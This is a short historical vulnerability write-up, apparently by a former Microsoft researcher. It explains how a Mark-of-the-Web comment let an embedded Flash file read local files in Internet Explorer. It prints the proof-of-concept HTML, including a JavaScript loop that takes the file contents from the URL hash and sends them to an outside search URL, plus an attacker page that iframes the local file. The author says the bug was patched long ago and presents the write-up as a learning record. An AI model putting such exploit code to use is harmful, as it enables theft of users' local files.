Mark-of-the-Web + Flash XML to Read Local Files

A local HTML file carrying a Mark-of-the-Web (MotW) comment runs in the Internet Zone rather than the Local Machine Zone. Flash files embedded in that page inherit the Internet Zone context, and because the Flash readfile.swf uses an XML request to read local files and passes the contents back via the URL hash, the data ends up exfiltrated to a remote search endpoint.

<!-- local_file_with_motw.html — a local file with Mark-of-the-Web -->
<!-- saved from url=(0024)http://www.cracking.com.ar/ -->
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
        width="550" height="300" id="readfile" align="middle">
    <param name="allowScriptAccess" value="Always" />
    <param name="movie" value="readfile.swf" />
</object>

<script language="JavaScript">
function getHashString()
{
    var strHash = location.hash.slice(1);
    if (strHash)
    {
        alert(unescape(strHash));
        top.location.href = "http://www.google.com/search?q=" + strHash;
    }
}
setInterval("getHashString()", 1000);
</script>

<!-- index.html (attacker-controlled page, loads the local MotW file) -->
<iframe src="file:///c:/test/local_file_with_motw.html" width="600" height="400"></iframe>

The Flash file reads a local file and places its contents in the page’s URL hash. The JavaScript polling loop then picks up the hash value and exfiltrates it to Google Search. The MotW is what makes this possible: it upgrades the local file’s zone to Internet, allowing the Flash allowScriptAccess=Always setting to work as it would on a web page.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.